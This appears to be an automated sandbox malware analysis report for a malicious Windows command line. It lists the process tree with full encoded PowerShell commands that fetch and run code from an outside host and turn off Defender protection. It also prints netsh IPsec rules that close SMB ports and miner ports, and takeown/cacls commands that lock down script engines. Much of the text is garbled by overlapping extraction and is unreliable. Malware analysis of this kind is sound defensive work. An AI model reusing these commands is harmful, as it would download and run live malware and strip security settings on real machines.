ID: 470361 Cookbook: defaultwindowscmdlinecookbook.jbs Time: 05:27:26 Date: 24/08/2021 Version: 33.0.0 White Diamond Table of Contents

Table of Contents 2 Windows Analysis Report 5 Overview 5 General Information 5 Detection 5 Signatures 5 Classification 5 Process Tree 5 Malware Configuration 7 Yara Overview 7 Dropped Files 7 Memory Dumps 7 Sigma Overview 8 System Summary: 8 Jbx Signature Overview 8 System Summary: 8 HIPS / PFW / Operating System Protection Evasion: 9 Lowering of HIPS / PFW / Operating System Security Settings: 9 Mitre Att&ck Matrix 9 Behavior Graph 9 Screenshots 10 Thumbnails 10 Antivirus, Machine Learning and Genetic Malware Detection 11 Initial Sample 11 Dropped Files 11 Unpacked PE Files 11 Domains 11 URLs 11 Domains and IPs 12 Contacted Domains 12 URLs from Memory and Binaries 12 Contacted IPs 12 Public 12 Private 12 General Information 12 Simulations 13 Behavior and APIs 13 Joe Sandbox View / Context 13 IPs 13 Domains 13 ASN 13 JA3 Fingerprints 14 Dropped Files 15 Created / dropped Files 15 Static File Info 19 No static file info 19 Network Behavior 20 Network Port Distribution 20 TCP Packets 20 UDP Packets 20 DNS Queries 20 DNS Answers 20 HTTPS Packets 20 Code Manipulations 21 Statistics 21 Behavior 21 System Behavior 21 Analysis Process: cmd.exe PID: 3208 Parent PID: 5092 21 General 21 File Activities 21 Analysis Process: conhost.exe PID: 4356 Parent PID: 3208 22 General 22 Analysis Process: powershell.exe PID: 4996 Parent PID: 3208 22 General 22 File Activities 22 File Created 22 File Deleted 22 File Written 23 File Read 23 Registry Activities 23 Analysis Process: powershell.exe PID: 900 Parent PID: 4996 23 General 23 File Activities 23 File Created 23 File Deleted 23 File Written 23 Copyright Joe Security LLC 2021 Page 2 of 44 File Read 23 Analysis Process: csc.exe PID: 372 Parent PID: 900 24 General 24 File Activities 24 File Created 24 File Deleted 24 File Written 24 File Read 24 Analysis Process: cvtres.exe PID: 1496 Parent PID: 372 24 General 24 File Activities 24 Analysis Process: msiexec.exe PID: 1064 Parent PID: 4552 24 General 24 Analysis Process: msiexec.exe PID: 5248 Parent PID: 4552 25 General 25 File Activities 25 Registry Activities 25 Analysis Process: netsh.exe PID: 4860 Parent PID: 5248 25 General 25 Analysis Process: conhost.exe PID: 5144 Parent PID: 4860 25 General 25 Analysis Process: netsh.exe PID: 1692 Parent PID: 5248 26 General 26 Analysis Process: conhost.exe PID: 2596 Parent PID: 1692 26 General 26 Analysis Process: netsh.exe PID: 5744 Parent PID: 5248 26 General 26 Analysis Process: conhost.exe PID: 5876 Parent PID: 5744 26 General 27 Analysis Process: netsh.exe PID: 5968 Parent PID: 5248 27 General 27 Analysis Process: conhost.exe PID: 6008 Parent PID: 5968 27 General 27 Analysis Process: netsh.exe PID: 6032 Parent PID: 5248 27 General 27 Analysis Process: conhost.exe PID: 6036 Parent PID: 6032 28 General 28 Analysis Process: netsh.exe PID: 6096 Parent PID: 5248 28 General 28 Analysis Process: conhost.exe PID: 6068 Parent PID: 6096 28 General 28 Analysis Process: netsh.exe PID: 4072 Parent PID: 5248 28 General 29 Analysis Process: conhost.exe PID: 476 Parent PID: 4072 29 General 29 Analysis Process: netsh.exe PID: 5616 Parent PID: 5248 29 General 29 Analysis Process: conhost.exe PID: 1496 Parent PID: 5616 29 General 29 Analysis Process: netsh.exe PID: 4568 Parent PID: 5248 30 General 30 Analysis Process: conhost.exe PID: 1844 Parent PID: 4568 30 General 30 Analysis Process: netsh.exe PID: 896 Parent PID: 5248 30 General 30 Analysis Process: conhost.exe PID: 340 Parent PID: 896 30 General 31 Analysis Process: netsh.exe PID: 4968 Parent PID: 5248 31 General 31 Analysis Process: conhost.exe PID: 2072 Parent PID: 4968 31 General 31 Analysis Process: netsh.exe PID: 2596 Parent PID: 5248 31 General 31 Analysis Process: conhost.exe PID: 5780 Parent PID: 2596 32 General 32 Analysis Process: netsh.exe PID: 4864 Parent PID: 5248 32 General 32 Analysis Process: conhost.exe PID: 5972 Parent PID: 4864 32 General 32 Analysis Process: netsh.exe PID: 5916 Parent PID: 5248 32 General 33 Analysis Process: conhost.exe PID: 6056 Parent PID: 5916 33 General 33 Analysis Process: netsh.exe PID: 5296 Parent PID: 5248 33 General 33 Analysis Process: conhost.exe PID: 572 Parent PID: 5296 33 General 33 Analysis Process: netsh.exe PID: 5040 Parent PID: 5248 34 General 34 Analysis Process: conhost.exe PID: 5264 Parent PID: 5040 34 General 34 Analysis Process: netsh.exe PID: 1752 Parent PID: 5248 34 General 34 Analysis Process: conhost.exe PID: 1036 Parent PID: 1752 34 General 35 Analysis Process: conhost.exe PID: 2436 Parent PID: 372 35 General 35 Analysis Process: netsh.exe PID: 3520 Parent PID: 5248 35

Copyright Joe Security LLC 2021 Page 3 of 44 General 35 Analysis Process: conhost.exe PID: 2256 Parent PID: 3520 35 General 35 Analysis Process: netsh.exe PID: 5228 Parent PID: 5248 36 General 36 Analysis Process: conhost.exe PID: 5440 Parent PID: 5228 36 General 36 Analysis Process: netsh.exe PID: 5908 Parent PID: 5248 36 General 36 Analysis Process: conhost.exe PID: 5860 Parent PID: 5908 36 General 37 Analysis Process: netsh.exe PID: 5880 Parent PID: 5248 37 General 37 Analysis Process: conhost.exe PID: 6008 Parent PID: 5880 37 General 37 Analysis Process: netsh.exe PID: 5240 Parent PID: 5248 37 General 37 Analysis Process: conhost.exe PID: 4344 Parent PID: 5240 38 General 38 Analysis Process: netsh.exe PID: 6056 Parent PID: 5248 38 General 38 Analysis Process: conhost.exe PID: 1256 Parent PID: 6056 38 General 38 Analysis Process: takeown.exe PID: 644 Parent PID: 5248 38 General 39 Analysis Process: conhost.exe PID: 2376 Parent PID: 644 39 General 39 Analysis Process: cacls.exe PID: 4956 Parent PID: 5248 39 General 39 Analysis Process: conhost.exe PID: 496 Parent PID: 4956 39 General 39 Analysis Process: takeown.exe PID: 4488 Parent PID: 5248 40 General 40 Analysis Process: conhost.exe PID: 2100 Parent PID: 4488 40 General 40 Analysis Process: cacls.exe PID: 3940 Parent PID: 5248 40 General 40 Analysis Process: conhost.exe PID: 4132 Parent PID: 3940 40 General 40 Analysis Process: takeown.exe PID: 2212 Parent PID: 5248 41 General 41 Analysis Process: conhost.exe PID: 1712 Parent PID: 2212 41 General 41 Analysis Process: cacls.exe PID: 2604 Parent PID: 5248 41 General 41 Analysis Process: conhost.exe PID: 5548 Parent PID: 2604 42 General 42 Analysis Process: takeown.exe PID: 5504 Parent PID: 5248 42 General 42 Analysis Process: conhost.exe PID: 5864 Parent PID: 5504 42 General 42 Analysis Process: cacls.exe PID: 5268 Parent PID: 5248 42 General 42 Analysis Process: conhost.exe PID: 6108 Parent PID: 5268 43 General 43 Analysis Process: powercfg.exe PID: 6092 Parent PID: 5248 43 General 43 Analysis Process: conhost.exe PID: 6044 Parent PID: 6092 43 General 43 Analysis Process: powershell.exe PID: 6072 Parent PID: 5248 44 General 44 Analysis Process: conhost.exe PID: 3556 Parent PID: 6072 44 General 44 Disassembly 44 Code Analysis 44

Copyright Joe Security LLC 2021 Page 4 of 44 Windows Analysis Report

Overview

General Information Detection Signatures Classification

Analysis ID: 470361 Maallliiicciiioouuss ssaampplllee ddeettteeccttteedd (((ttthhrrroouugghh … Infos: SMSiiigagmlicaiao dudeset tteseacctmtteedpd:l::e EE dmeptpeiiirrrceet e PPdoo (wwtheerrrroSSuhhgeehlllll l…

USUsisgeemss a nn edetettsstheh c tttotoe md:o oEddmiiifffyyp tittrhheee P WoiwiinneddrooSwwhsse nlnl … Most interesting Screenshot: UUsseess nneettsshh ttoo mooddiiffyy tthhee Wiinnddoowwss nn…

Ransomware EUEnsncecrrsryy pnptteteetdsd h pp otooww meerrorssdhhiefeylllll l t chcme ddWllliiininneed oopwptttsiiioo nn… Miner Spreading

VEVenercryyr y llopontneggd c cpooomwmearasnnhdde llilin nceem ffdooluuinnnedd option VVeerrryy llloonngg ccoommaanndd llliiinnee fffoouunndd mmaallliiiccciiioouusss malicious

Evader Phishing

sssuusssppiiiccciiioouusss SVSiieiggrmy alao dndegett tececocttmteedmd::: a SSnuudss plpiniiicceiiio ofuousus n PPdoowweerrrSS… suspicious

cccllleeaann

clean SSiiiggmaa ddeettteeccttteedd::: SSuussppiiicciiioouuss CPCsoscwc...eexrxS…

Exploiter Banker SSiiiggmaa ddeettteeccttteedd::: SSuussppiiicciiioouuss CCesercrrttt.uuetttxiiilll…

USUsisgeemss a pp odowewteerrrccctffefggd...e:e xSxeeu tsttoop imcioodudisiifffy yC tttheheret u pptoiol… Spyware Trojan / Bot

Adware QUusueesrrrii ieepsso wttthheeer cvvfooglll.uuemxee tiiionn fffmoorrromdaaifttytiiio otnhn e (((n npaaom… Score: 84 Range: 0 - 100 YQYaaurrreaar isesiiisgg nnthaaetttuu vrrreoe l mumaatettcc hihnformation (nam

Whitelisted: false VYVeaerrryay llslooingngng a cctmurddelll iiinmneea otocpphtttiiioonn fffoouunndd,,, ttthhiiiss… Confidence: 100% MVeaaryy sslollleeneegpp c (((meevvdaalisnsiiievve eo lpllootoiooppnss )f)) o tttouo n hhdiiin,n dtdheeirsrr …

CMCrrraeeyaa ttsteeless e fffipiillle e(sse viiinnassiiididvee tttlhoheoe p sssyy)ss ttteoem h i ndddiiirrreercc …

SCSaraemapptelllees eefixlxeeescc uiuntttisiiooindn e ss tttohopeps ss wywshhtieiillleem pp drrroiorceceec… Process Tree TSToaoomo mplaean neyyx sesiicimuiitillliaaorrrn p psrrrotooccpeesss swseehssi l efffoo puurnnoddce

JTJAAo3o3 SmSSSaLnL y cc lsliieeimnntit l fafiinrn gpgereorrpcpreriinsntst essese eefonnu iinn d ccoo System is w10x64 JJAA33 SSSSLL ccllliiieennttt fffiiinnggeerrrpprrriiinnttt sseeeenn iiinn ccoo…

cmd.exe (PID: 3208 cmdline: cmd /C 'powershell.exe -nop -exec bypass -Encode DQAKAGFJFYAooAu3unb nSdwdS BddLryrr ooAcpplCipepgeneAdtd Jf PiPAnEEgB e pfffiriilAllpeeDr wiwn0hthA isiicMcehheQ hnhAa ai7snsA ncnCooQ…AaQAgAC0AbABlACAAMQAwADAAOwAkA GkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcABzADoALwAvADYAZgB6AC4AbwBuAGUALwBkAC4AcABoAHAAPwBpAD0AMQAnADsAaQBlAHgAKABuA GUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AUFUZosAseueBsnsv d iiiAn ndsHsreeocccApuupbrrreged B TT sPLLASESG /f// 8i lSSeAS SYwLLQh vivBceehkrrrsA shiiiHoaonMsn fnfAfoood…AByAGkAbgBnACgAJABhACkAOwBNA HMAaQBNAGEAawBlACAAKAAiACQAYQAiACsAJwA2ACcAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADMAMAANAAoAfQANAAoA' MD5: CUCosonentsttaa iiinnsse lllocounnrgge s sTllleeLeeSpp s/s S (((>S>==L 33v e mrsiiinnio)))n fo F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 4356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) ECEnonanabtballleeinsss d dleoebnbugug gs plperrreiiivvpiiillslee g(g>ee=ss 3 min) powershell.exe (PID: 4996 cmdline: powershell.exe -nop -exec bypass -Encode DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwA kAGkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcABzADoALwAvADYAZgFEFBonou6aunAbndlCde a4sa A hdhbieiiggwbhhuB ngnuu uApmGribvbUeielAerrr g Looewfff s WBkiiinAnddCoo4wwA /c// AUUBss…oAHAAPwBpAD0AMQAnADsAaQBlAHgAKAB uAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJABhACkAOwB PFPEoEu fffniiilllede dado oheeigss h nn onotutt imiimbppeoorrr rttot afa nWnyyi nfffuudnnoccwtttii ioo/ nnUsss NAHMAaQBNAGEAawBlACAAKAAiACQAYQAiACsAJwA2ACcAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADMAMAANAAoAfQANAAoA MD5: DBA3E6449E97D4E3DF64527EF7012A10) DPDrErroo pfpislse P PdEEo e fffisiillle enssot import any functions powershell.exe (PID: 900 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -exec bypass -EncodedCommand DQAKAFMAZQB0AC0A TQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUgBlAGTDTrErriiioeeApssb s tAtt ooPB llElo0o aAafiddGle mskAiiissbssQiiinnBggl A DDELL0LLAssbwBuAGkAdABvAHIAaQBuAGcAIAAkAHQAcgB1AGUA DQAKAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAiACQAZQBuAHYAOgB3AGkAbgBkAGkA Tries to load missing DLLs cgAiAA0ACgAkAFIAZQBnAGsAZQB5AHAAYQB0AGgAIAA9ACAAIgBIAEsAQwBVADUoTUArssieXesAs cBtcoaaT clcAolllsasG dttt8oo mA mZisogosdBdiniii0fffygyA tDtHthhLeceLA ppsYeeQrrrmBiiiyssAssiiGioonUn…AXAA3AC0AWgBpAHAAIgANAAoAQQBkAGQA LQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4A CUCosomespp ciiillleaescs l sCC #t#o o omrrr oVVdBBif...yNN etehttt e cc opodederemission ZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkA bgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACCrroAreemAaatcptteewilsseB soo0 rrrCA m#Go ooEddrAi iiffVfidiieeBAss.B NwwpeiiiAnnt dGdcooMwwdAses I sAseeBrrrjvvAiiicGceewssAYQBzAHMAIABQAEYAOAA4AGQATgBjAGQA cwBEAEQAcQBlADcAWgBmAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgA YQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwBSCS0iiAriggeGmaEtaae A sddd eeoAtttree BmccpttteoeAddG:i::f iMCCeosAo nnIwAhhioBnosdlsAttot HPwPagasrAr resednenAtrtt v BPPiclrrAroeoH…sIAbgAgAGkAbgB0ACAATQBzAGkASQBuAHMA dABhAGwAbABQAHIAbwBkAHUAYwB0ACgAcwB0AHIAaQBuAGcAIABwAGEAYwBrAGEAZwBlAFAAYQB0AGgALAAgAHMAdAByAGkAbgBnACAAYwBvAG0AbQBhAG4A ZABMAGkAbgBlACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzACSCGrirrgekemaAattLtaeeg ssdB eaakt eAppcrrGrotoewccdeeA:ss bCssA oiiinAn i hsAsuouCsskptp AePeXnandQrdeeAnddNt mPAorAoo…oAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkA YwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAaQBuAHQAIABkAHcAVQBJAEwAZQB2AGUAbAAsACAA Creates a process in suspended mo SQBuAHQAUAB0AHIAIABwAGgAVwBuAGQAKQA7AA0ACgB9AA0ACgAiAEAADQAKAGQAbwANAAoAewANAAoAJABtAHMAaQBwAGEAdABoAEEAIAA9ACAAIgBoAHQA dABwAHMAOgAvAC8ANgBmAHoALgBvAG4AZQAvAGQALgBwAGgAcAA/AGkAPQAxADYAIgANAAoAJABtAHMAaQBwAGEAdABoAEEATABMACAAPQAgAEAAKAAiACQA bQBzAGkAcABhAHQAaABBACIALAAiACQAbQBzAGkAcABhAHQAaABBACIAKQANAAoAJABOAGQAUwBVAEkAdwB1AHUAVwBuAHAAWQBIAHoARgB1ACAAPQAgAGcA ZQB0AC0AcgBhAG4AZABvAG0AIAAkAG0AcwBpAHAAYQB0AGgAQQBMAEwAOwANAAoAWwBQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAF 0AOgA6AE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKAAyACwAMAApADsADQAKAFsAUABGADgAOABkAE4AYwBkAHMARABEAHEAZQA3AFoAZgBdAD oAOgBNAHMAaQBJAG4AcwB0AGEAbABsAFAAcgBvAGQAdQBjAHQAKAAiACQATgBkAFMAVQBJAHcAdQB1AFcAbgBwAFkASAB6AEYAdQAiACwAIgAiACkADQAKAF MAdABhAHIAdAAtAFMAbABlAGUAcAAgADYAMAANAAoAfQANAAoAdQBuAHQAaQBsACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAG EAdABoACAAJABSAGUAZwBrAGUAeQBwAGEAdABoACAALQBuAGEAbQBlACAAUwB0AGEAeQBPAG4AVABvAHAAKQANAAoA MD5: DBA3E6449E97D4E3DF64527EF7012A10) csc.exe (PID: 372 cmdline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjp55l32\hjp55l32. cmdline' MD5: 350C52F71BDED7B99668585C15D70EEA) cvtres.exe (PID: 1496 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\A ppData\Local\Temp\RES2CD4.tmp' 'c:\Users\user\AppData\Local\Temp\hjp55l32\CSC19AB26A2AE5E4078BE27BAEBF17BEA80.TMP' MD5: C09985AE74F0882F208D75DE27770DFA) conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) msiexec.exe (PID: 1064 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding B689D01F43C91B84ED8BE4676C8E722B MD5: 12C17B5A5C2A7B97342C362CA467E9A2) msiexec.exe (PID: 5248 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 8A139D1F2E341CAE02DE3AE4A26DCC8A E Global\MSI0000 MD5: 12C17B5A5C2A7B97342C362CA467E9A2) netsh.exe (PID: 4860 cmdline: 'C:\Windows\SysWOW64\netsh.exe' interface ipv6 install MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 1692 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add policy name=qianye MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

Copyright Joe Security LLC 2021 Page 5 of 44 conhost.exe (PID: 2596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 5744 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filterlist name=Filter1 MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 5968 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 6032 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 6096 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 4072 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 5616 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 4568 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 1844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 896 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 4968 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 2072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 2596 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) netsh.exe (PID: 4864 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 5916 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 6056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) conhost.exe (PID: 1256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 5296 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 5040 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 1752 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 1036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 3520 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 2256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 5228 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 5908 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 5880 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filteraction name=FilteraAtion1 action=block MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 5240 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1 MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) conhost.exe (PID: 4344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) netsh.exe (PID: 6056 cmdline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static set policy name=qianye assign=y MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) takeown.exe (PID: 644 cmdline: 'C:\Windows\SysWOW64\takeown.exe' /f C:\Windows\system32\jscript.dll MD5: 13FC919F91DAE13EA83970363CE170BD) conhost.exe (PID: 2376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) cacls.exe (PID: 4956 cmdline: 'C:\Windows\SysWOW64\cacls.exe' C:\Windows\system32\jscript.dll /E /P everyone:N MD5: 4CBB1C027DF71C53A8EE4C855FD35B25) conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) takeown.exe (PID: 4488 cmdline: 'C:\Windows\SysWOW64\takeown.exe' /f C:\Windows\syswow64\jscript.dll MD5: 13FC919F91DAE13EA83970363CE170BD) conhost.exe (PID: 2100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) cacls.exe (PID: 3940 cmdline: 'C:\Windows\SysWOW64\cacls.exe' C:\Windows\syswow64\jscript.dll /E /P everyone:N MD5: 4CBB1C027DF71C53A8EE4C855FD35B25) conhost.exe (PID: 4132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) takeown.exe (PID: 2212 cmdline: 'C:\Windows\SysWOW64\takeown.exe' /f C:\Windows\system32\cscript.exe MD5: 13FC919F91DAE13EA83970363CE170BD) conhost.exe (PID: 1712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) cacls.exe (PID: 2604 cmdline: 'C:\Windows\SysWOW64\cacls.exe' C:\Windows\system32\cscript.exe /E /P everyone:N MD5: 4CBB1C027DF71C53A8EE4C855FD35B25) conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 